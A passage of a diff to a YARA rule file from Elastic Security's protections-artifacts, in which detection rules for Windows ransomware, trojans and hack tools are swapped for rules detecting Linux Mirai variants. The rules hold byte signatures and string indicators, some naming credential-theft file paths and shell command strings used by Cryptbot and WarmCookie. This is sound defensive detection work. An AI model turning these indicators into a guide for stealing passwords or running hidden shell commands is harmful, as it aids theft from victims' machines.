tags = "FILE, MEMORY" + fingerprint = "c3674075a435ef1cd9e568486daa2960450aa7ffa8e5dbf440a50e01803ea2f3" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 73 00 65 00 67 00 77 00 69 00 6E 00 64 00 72 00 76 00 78 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x64][\x00-\x00])([\x00-\x02][\x00-\x00])([\x00-\x07][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x63][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x64][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x06][\x00-\x00]))/ + $a = { 00 00 66 83 7C 24 34 FF 66 89 46 2C 0F 85 C2 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Ransomware_Stop_1E8D48Ff : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_D33095D4 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Stop (Windows.Ransomware.Stop)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "1e8d48ff-e0ab-478d-8268-a11f2e87ab79" - date = "2021-06-10" - modified = "2021-08-23" + id = "d33095d4-ea02-4588-9852-7493f6781bb4" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Stop.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3" - logic_hash = "d743feae072a5f3e1b008354352bef48218bb041bc8a5ba39526815ab9cd2690" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1581-L1599" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "72326a3a9160e9481dd6fc87159f7ebf8a358f52bf0c17fbc3df80217d032635" + logic_hash = "b7feaec65d72907d08c98b09fb4ac494ceee7d7bd51c09063363c617e3f057a4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb" + fingerprint = "20c0faab6aef6e0f15fd34f9bd173547f3195c096eb34c4316144b19d2ab1dc4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = "E:\\Doc\\My work (C++)\\_Git\\Encryption\\Release\\encrypt_win_api.pdb" ascii fullword - $b = { 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF } + $a = { 00 00 66 83 7C 24 54 FF 66 89 46 04 0F 85 CB } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Warmcookie_7D32Fa90 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_4E2246Fb : FILE MEMORY { meta: - description = "Detects Windows Trojan Warmcookie (Windows.Trojan.WarmCookie)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "7d32fa90-c6e0-4a4b-bc21-51d82c57721e" - date = "2024-04-29" - modified = "2024-05-08" - reference = "https://www.elastic.co/security-labs/dipping-into-danger" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_WarmCookie.yar#L1-L32" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ccde1ded028948f5cd3277d2d4af6b22fa33f53abde84ea2aa01f1872fad1d13" - logic_hash = "ed3be6e5c6127ef87f9ef6fe35b17815b96706e8e73a393ee9b0a8e3b0cd8f66" + id = "4e2246fb-5f9a-4dea-8041-51758920d0b9" + date = "2021-04-06" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1601-L1619" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1f6bcdfc7d1c56228897cd7548266bb0b9a41b913be354036816643ac21b6f66" + logic_hash = "6d2e1300286751a5e1ae683e9aab2f59bfbb20d1cc18dcce89c06ecadf25a3e6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ae6c81fc7b0ba16567fefa714d043556afa44bfd698f6478c21d6e6428b14858" + fingerprint = "23b0cfabc2db26153c02a7dc81e2006b28bfc9667526185b2071b34d2fb073c4" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $seq_checksum = { 45 8D 5D ?? 45 33 C0 41 83 E3 ?? 49 8D 4E ?? 44 03 DB 41 8D 53 ?? } - $seq_string_decrypt = { 8B 69 04 48 8D 79 08 8B 31 89 6C 24 ?? 48 8D 4E ?? E8 } - $seq_filesearch = { 48 81 EC 58 02 00 00 48 8B 05 82 0A 02 00 48 33 C4 48 89 84 24 40 02 00 00 45 33 C9 48 8D 44 24 30 45 33 C0 48 89 44 24 20 33 C9 41 8D 51 1A FF 15 83 4D 01 00 85 C0 78 22 48 8D 4C 24 30 E8 1D } - $seq_registry = { 48 81 EC 80 02 00 00 48 8B 05 F7 09 02 00 48 33 C4 48 89 84 24 70 02 00 00 4C 89 B4 24 98 02 00 00 48 8D 0D 4D CA 01 00 45 33 F6 41 8B FE E8 02 4F 00 00 48 8B E8 41 B9 08 01 00 00 48 8D 44 24 } - $plain_str1 = "release.dll" ascii fullword - $plain_str2 = "\"Main Invoked.\"" ascii fullword - $plain_str3 = "\"Main Returned.\"" ascii fullword - $decrypt_str1 = "ERROR: Cannot write file" wide fullword - $decrypt_str2 = "OK (No output data)" wide fullword - $decrypt_str3 = "OK (See 'Files' tab)" wide fullword - $decrypt_str4 = "cmd.exe /c %ls" wide fullword - $decrypt_str5 = "Cookie:" wide fullword - $decrypt_str6 = "%ls\\*.*" wide fullword + $a = { 00 00 B8 01 00 00 00 31 DB CD 80 EB FA 8D 8B 10 } condition: - (3 of ($plain*)) or (2 of ($seq*)) or 4 of ($decrypt*) + all of them } -rule ELASTIC_Windows_Hacktool_Executeassembly_F41F4Df6 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_D5981806 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Executeassembly (Windows.Hacktool.ExecuteAssembly)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "f41f4df6-03de-4a03-9dfa-4f9d0f51c2de" - date = "2023-03-28" - modified = "2023-04-23" + id = "d5981806-0db8-4422-ad57-5d1c0f7464c3" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_ExecuteAssembly.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a468ba2ba77aafa2a572c8947d414e74604a7c1c6e68a0b87fbfce4f8854dd61" - logic_hash = "ab72dec636a96338e16fd57f2db4bb52e38fe61315b42c2ffe9c4566fc0326d3" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1621-L1639" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "784f2005853b5375efaf3995208e4611b81b8c52f67b6dc139fd9fec7b49d9dc" + logic_hash = "e625323543aa5c8374a179dfa51c3f5be1446459c45fa7c7a27ae383cf0f551b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4875f516551517ec9423f04a9636b65fc717b9e2c9c40379b027ab126e593d23" + fingerprint = "b0fd8632505252315ba551bb3680fa8dc51038be17609018bf9d92c3e1c43ede" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $bytes0 = { 33 D8 8B C3 C1 E8 05 03 D8 8B C3 C1 E0 04 33 D8 8B C3 C1 E8 11 03 D8 8B C3 C1 E0 19 33 D8 8B C3 C1 E8 06 03 C3 } - $bytes1 = { 81 F9 8E 4E 0E EC 74 10 81 F9 AA FC 0D 7C 74 08 81 F9 54 CA AF 91 75 43 } + $a = { 3F 00 00 66 83 7C 24 38 FF 66 89 46 04 0F 85 EA } condition: all of them } -rule ELASTIC_Windows_Hacktool_Iox_98Cd1Cd8 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_C6055Dc9 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Iox (Windows.Hacktool.Iox)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "98cd1cd8-8a0c-489e-86d1-58da88dc2c71" - date = "2024-01-24" - modified = "2024-01-29" - reference = "https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_Iox.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "d4544a521d4e6eb07336816b1aae54f92c5c4fd2eb31dcfbdf26e4ef890e73db" - logic_hash = "d7f9e4f399410d54416e974fbd66b2caa27359ae0f2e33e01d62f1aa618daa34" + id = "c6055dc9-316b-478d-9997-1dbf455cafcc" + date = "2021-04-06" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1641-L1659" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c1718d7fdeef886caa33951e75cbd9139467fa1724605fdf76c8cdb1ec20e024" + logic_hash = "4d9d7c44f0d3ae60275720ae5faf3c25c368aa6e7d9ab5ed706a30f9a7ffd3b8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8c0f4041223713bef105ca5986b9ec30b4bfb22aeeab8f4465938cf8212fc7c1" + fingerprint = "b95f582edf2504089ddd29ef1a0daf30644b364f3d90ede413a2aa777c205070" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $param_check_b0 = { 48 83 FB 05 0F 85 ?? ?? ?? ?? 81 38 70 72 6F 78 66 0F 1F 44 00 00 0F 85 ?? ?? ?? ?? 80 78 04 79 0F 85 ?? ?? ?? ?? 48 83 F9 03 } - $param_check_b1 = { 48 8B 14 24 4C 8B 5C 24 18 4C 8B 64 24 08 4C 8B 6C 24 08 4C 8B 7C 24 20 66 0F 1F 84 00 00 00 00 00 48 83 FB 03 0F 85 ?? ?? ?? ?? 66 81 38 66 77 0F 85 ?? ?? ?? ?? 80 78 02 64 } - $param_check_b2 = { 81 38 2D 2D 6C 6F 0F 1F 44 00 00 0F 85 ?? ?? ?? ?? 66 81 78 04 63 61 0F 85 ?? ?? ?? ?? 80 78 06 6C } - $param_check_b3 = { 83 FA 05 0F 85 ?? ?? ?? ?? 81 38 2D 2D 6B 65 0F 85 ?? ?? ?? ?? 80 78 04 79 90 } + $a = { 83 7F 43 80 77 39 CF 7E 09 83 C8 FF 5A 5D 8A 0E } condition: - 3 of them + all of them } -rule ELASTIC_Linux_Trojan_Badbee_231Cb054 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_3B9675Fd : FILE MEMORY { meta: - description = "Detects Linux Trojan Badbee (Linux.Trojan.Badbee)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "231cb054-36a9-434f-8254-17fee38e5275" + id = "3b9675fd-1fa1-4e15-9472-64cb93315d63" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Badbee.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "832ba859c3030e58b94398ff663ddfe27078946a83dcfc81a5ef88351d41f4e2" - logic_hash = "a1ed8f2da9b4f891a5c65d943424bb7c465f0d07e7756e292c617ce5ef14d182" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1661-L1679" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4ec4bc88156bd51451fdaf0550c21c799c6adacbfc654c8ec634ebca3383bd66" + logic_hash = "61ff7cb8d664291de5cf0c82b80cf0f4001c41d3f02b7f4762f67eb8128df15d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ebe789fc467daf9276f72210f94e87b7fa79fc92a72740de49e47b71f123ed5c" + fingerprint = "40a154bafa72c5aa0c085ac2b92b5777d1acecfd28d28b15c7229ba5c59435f2" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -104148,28 +104461,29 @@ rule ELASTIC_Linux_Trojan_Badbee_231Cb054 : FILE MEMORY os = "linux" strings: - $a = { 8D B4 41 31 44 97 10 83 F9 10 75 E4 89 DE C1 FE 14 F7 C6 01 00 } + $a = { 78 10 85 C9 75 65 48 8B 8C 24 A0 00 00 00 48 89 48 10 0F B6 4C } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2009_2698_12374E97 : FILE MEMORY CVE_2009_2698 +rule ELASTIC_Linux_Trojan_Mirai_1C0D246D : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2009 2698 (Linux.Exploit.CVE-2009-2698)" + description = "Based off community provided sample" author = "Elastic Security" - id = "12374e97-385e-4b3a-9d50-39f35ad4f6dd" - date = "2021-01-12" + id = "1c0d246d-dc23-48d6-accb-1e1db1eba49b" + date = "2021-04-13" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2009_2698.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "656fddc1bf4743a08a455628b6151076b81e604ff49c93d797fa49b1f7d09c2f" - logic_hash = "ed86a239b909681f2ab3503cfedf202dbe5f53a6f554cf4db13f08bee625c0b7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1681-L1700" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "211cfe9d158c8a6840a53f2d1db2bf94ae689946fffb791eed3acceef7f0e3dd" + logic_hash = "7a101e6d2265e09eb6c8d0f1a2fe54c9aa353dfd8bd156926937f4aec86c3ef1" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2009-2698" - fingerprint = "2c669220ac8909e2336bbf9c38489c8e32d573ab6c29fa1e2e0c1fe69f7441ed" + tags = "FILE, MEMORY" + fingerprint = "b6b6991e016419b1ddf22822ce76401370471f852866f0da25c7b0f4bec530ee" + threat_name = "Linux.Trojan.Mirai" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -104177,28 +104491,27 @@ rule ELASTIC_Linux_Exploit_CVE_2009_2698_12374E97 : FILE MEMORY CVE_2009_2698 os = "linux" strings: - $a = { 74 64 6F 75 74 00 66 77 72 69 74 65 00 64 65 73 63 00 63 76 65 00 } + $a = { E7 C0 00 51 78 0F 1B FF 8A 7C 18 27 83 2F 85 2E CB 14 50 2E } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2009_2698_Cc04Dddd : FILE MEMORY CVE_2009_2698 +rule ELASTIC_Linux_Trojan_Mirai_Ad337D2F : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2009 2698 (Linux.Exploit.CVE-2009-2698)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "cc04dddd-91d0-4c5f-a0ac-01787da7f369" - date = "2021-04-06" + id = "ad337d2f-d4ac-42a7-9d2e-576fe633fa16" + date = "2021-06-28" modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2009_2698.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "502b73ea04095e8a7ec4e8d7cc306242b45850ad28690156754beac8cd8d7b2d" - logic_hash = "68daa56ca98cc8f713faa138432190d19c27f07b2182a1f82347a3bfc5821ebb" + reference = "012b717909a8b251ec1e0c284b3c795865a32a1f4b79706d2254a4eb289c30a7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1702-L1720" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "dba630c1deb00b0dbd9f895a9b93393bc634150c8f32527b02d8dd71dc806e7d" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2009-2698" - fingerprint = "d3fdd66e486cb06bd63f6d8e471e66bc80990c4f0729eea16b47adc4cac80538" + tags = "FILE, MEMORY" + fingerprint = "67cbcb8288fe319c3b8f961210748f7cea49c2f64fc2f1f55614d7ed97a86238" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -104206,408 +104519,374 @@ rule ELASTIC_Linux_Exploit_CVE_2009_2698_Cc04Dddd : FILE MEMORY CVE_2009_2698 os = "linux" strings: - $a = { C4 10 89 45 F4 83 7D F4 FF 75 1F 83 EC 0C 68 } + $a = { 01 75 14 80 78 FF 2F 48 8D 40 FF 0F 94 C2 48 39 D8 77 EB 84 D2 } condition: all of them } -rule ELASTIC_Windows_Trojan_Cryptbot_489A6562 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_88A1B067 : FILE MEMORY { meta: - description = "Detects Windows Trojan Cryptbot (Windows.Trojan.Cryptbot)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "489a6562-870c-4105-9bb7-52ab09e5b09c" - date = "2021-08-18" - modified = "2021-10-04" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Cryptbot.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "423563995910af04cb2c4136bf50607fc26977dfa043a84433e8bd64b3315110" - logic_hash = "7fee3cc67419e66de790ba2ad8c3102425b3a45bdfe31801758dd38021a8439b" + id = "88a1b067-11d5-4128-b763-2d1747c95eef" + date = "2021-06-28" + modified = "2021-09-16" + reference = "1a62db02343edda916cbbf463d8e07ec2ad4509fd0f15a5f6946d0ec6c332dd9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1722-L1740" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "0755f1f974734ccd4ecc444217bf52ed306d1dc32c05841ba9ca6d259e1a147e" score = 75 - quality = 25 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "f4578d79f8923706784e9d55a70ec74051273a945d2b277daa6229724defec3f" + fingerprint = "b32b42975297aed7cef72668ee272a5cfb753dce7813583f0c3ec91e52f8601f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "/c rd /s /q %Temp%\\" wide fullword - $a2 = "\\_Files\\_AllPasswords_list.txt" wide fullword - $a3 = "\\files_\\cryptocurrency\\log.txt" wide fullword - $a4 = "%wS\\%wS\\%wS.tmp" wide fullword - $a5 = "%AppData%\\waves-exchange" wide fullword + $a = { 00 00 00 55 89 E5 0F B6 55 08 0F B6 45 0C C1 E2 18 C1 E0 10 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Dharma_Aa5Eefed : BETA FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_76Bbc4Ca : FILE MEMORY { meta: - description = "Identifies DHARMA ransomware" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "aa5eefed-7212-42c9-b51d-2c58c65b53e5" - date = "2020-06-25" - modified = "2021-08-23" - reference = "https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Dharma.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "bbafc2eac17562f315b09fa42eb601d0140152917d7962429df3a378abe67732" + id = "76bbc4ca-e6da-40f7-8ba6-139ec8393f35" + date = "2021-06-28" + modified = "2021-09-16" + reference = "1a9ff86a66d417678c387102932a71fd879972173901c04f3462de0e519c3b51" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1742-L1760" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "855b7938b92b5645fcefd2ec1e2ccb71269654816f362282ccbf9aef1c01c8a0" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "d3baf3474b450931b594322d190b243bdd813156ad80f04abcadde0db3bfe149" - threat_name = "Windows.Ransomware.Dharma" + tags = "FILE, MEMORY" + fingerprint = "4206c56b538eb1dd97e8ba58c5bab6e21ad22a0f8c11a72f82493c619d22d9b7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $c1 = { 4D F0 51 8B 55 E8 52 E8 CD 10 00 00 83 C4 08 89 45 E8 8A 45 F9 04 01 88 45 F9 0F B6 4D F9 8B 55 E4 8A 04 0A 88 45 FB 0F B6 4D FB 0F B6 55 FA 03 D1 88 55 FA 0F B6 45 FA 8B 4D E4 8A 14 01 88 55 EF 0F B6 45 F9 8B 4D E4 8A 55 EF 88 14 01 0F B6 45 FA 8B 4D E4 8A 55 FB 88 14 01 8B 45 0C 03 45 F4 0F B6 08 0F B6 55 FB 0F B6 45 EF 03 D0 0F B6 D2 8B 45 E4 0F B6 14 10 33 CA 8B 45 E8 03 45 F4 88 08 } - $c2 = { 21 0C 7D 01 02 04 08 10 20 40 80 1B 36 6C D8 AB 4D 9A 2F 5E BC 63 C6 97 35 6A D4 B3 7D FA EF C5 91 00 00 A5 63 63 C6 84 7C 7C F8 99 77 77 EE 8D 7B 7B F6 0D F2 F2 FF BD 6B 6B D6 B1 6F 6F DE 54 C5 C5 91 50 30 30 60 03 01 01 02 A9 67 67 CE 7D 2B 2B 56 } + $a = { 10 40 2D E9 00 40 A0 E1 28 20 84 E2 0C 00 92 E8 3B F1 FF EB } condition: - 1 of ($c*) + all of them } -rule ELASTIC_Windows_Ransomware_Dharma_B31Cac3F : BETA FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_0Bfc17Bd : FILE MEMORY { meta: - description = "Identifies DHARMA ransomware" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "b31cac3f-6e04-48b2-9d16-1a6b66fa8012" - date = "2020-06-25" - modified = "2021-08-23" - reference = "https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Dharma.yar#L23-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "30500e35721e9db3d63cafa5ca10818557fa9f4e0bda9c0d02283183508cf7b5" + id = "0bfc17bd-49bb-4721-9653-0920b631b1de" + date = "2022-01-05" + modified = "2022-01-26" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1762-L1780" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1cdd94f2a1cb2b93134646c171d947e325a498f7a13db021e88c05a4cbb68903" + logic_hash = "ef83bc9ae3c881d09b691db42a1712b500a5bb8df34060a6786cfdc6caaf5530" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "25d23d045c57758dbb14092cff3cc190755ceb3a21c8a80505bd316a430e21fc" - threat_name = "Windows.Ransomware.Dharma" + tags = "FILE, MEMORY" + fingerprint = "d67e4e12e74cbd31037fae52cf7bad8d8d5b4240d79449fa1ebf9a271af008e1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $b1 = "sssssbsss" ascii fullword - $b2 = "sssssbs" ascii fullword - $b3 = "RSDS%~m" ascii fullword + $a = { 54 24 64 0F CD 48 8D 14 52 41 0F B6 4C D7 14 D3 E8 01 C5 83 7C 24 } condition: - 3 of ($b*) + all of them } -rule ELASTIC_Windows_Ransomware_Dharma_E9319E4A : BETA FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_389Ee3E9 : FILE MEMORY { meta: - description = "Identifies DHARMA ransomware" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "e9319e4a-3850-4bad-9579-4b73199a0963" - date = "2020-06-25" - modified = "2021-08-23" - reference = "https://blog.malwarebytes.com/threat-analysis/2019/05/threat-spotlight-crysis-aka-dharma-ransomware-causing-a-crisis-for-businesses/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Dharma.yar#L46-L65" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "182ed508d645a0b1fab80fb6f975a05d33b64c43005bd3656df6470934cd71f4" + id = "389ee3e9-70c1-4c93-a999-292cf6ff1652" + date = "2022-01-05" + modified = "2022-01-26" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L1782-L1800" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f" + logic_hash = "fedeae98d468a11c3eaa561b9d5433ec206bdd4caed5aed7926434730f7f866b" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "4a4f3aebe4c9726cf62dde454f01cbf6dcb09bf3ef1b230d548fe255f01254aa" - threat_name = "Windows.Ransomware.Dharma" + tags = "FILE, MEMORY" + fingerprint = "59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $d = { 08 8B 51 24 8B 45 08 8B 48 18 0F B7 14 51 85 D2 74 47 8B 45 08 8B } + $a = { 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 